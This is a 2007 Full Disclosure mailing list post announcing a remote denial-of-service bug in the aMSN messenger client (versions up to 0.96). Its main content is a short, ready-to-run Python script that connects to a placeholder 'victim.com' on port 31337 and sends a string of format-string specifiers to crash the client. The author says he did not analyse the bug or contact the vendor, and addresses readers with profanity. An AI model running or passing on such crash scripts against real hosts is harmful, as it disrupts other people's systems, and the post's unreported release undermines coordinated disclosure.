Full Disclosure mailing list archives
aMSN <= 0.96 remote DoS vulnerability
From: Levent Kayan <levent () corehack org>
Date: Sat, 21 Apr 2007 04:35:28 +0200
/* * bug: amsn remote DoS vulnerability * affected version: <= 0.96 * site: http://amsn-project.net/ * tested: amsn-0.96 on freebsd 6.2 * * author: levent kayan * date: Tue Mar 27 16:04:51 CEST 2007 * www.corehack.org */ /* Introduction */ amsn is a free open source MSN Messenger clone. /* Technical details */ During fuzzing some instant-messaging applications, I found a basic bug in amsn. I just sent some characters to that amsn port and noticed that it has reported an error and was killed. I didn't analyse the bug though. Maybe you're interested in doing so. :P The following python script is enough to produce a DoS attack and kill the client: ---fuck off here--- import socket HOST = 'victim.com' PORT = 31337 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) i = 1 while i <= 3: s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\ ?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\ %n%n%n%n%n%n\????#?[{#?]?#\`~??') ---fuck off here--- I think it were the character '}', '{' or '%x', '%n'. Try to determine this for yourself! Don't bug me with this shit. /* Vendor contacted? */ NO! Why should I contact them? :) lol, go away and contact them yourself. /* EOF */ -- Name: Levent Kayan E-Mail: levent () corehack org GPG key: 0xd6794965 Key fingerprint: FD20 03C3 DD7F 51BB 224F F11E 0855 23C8 D679 4965 Website: http://www.corehack.org/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- aMSN <= 0.96 remote DoS vulnerability Levent Kayan (Apr 21)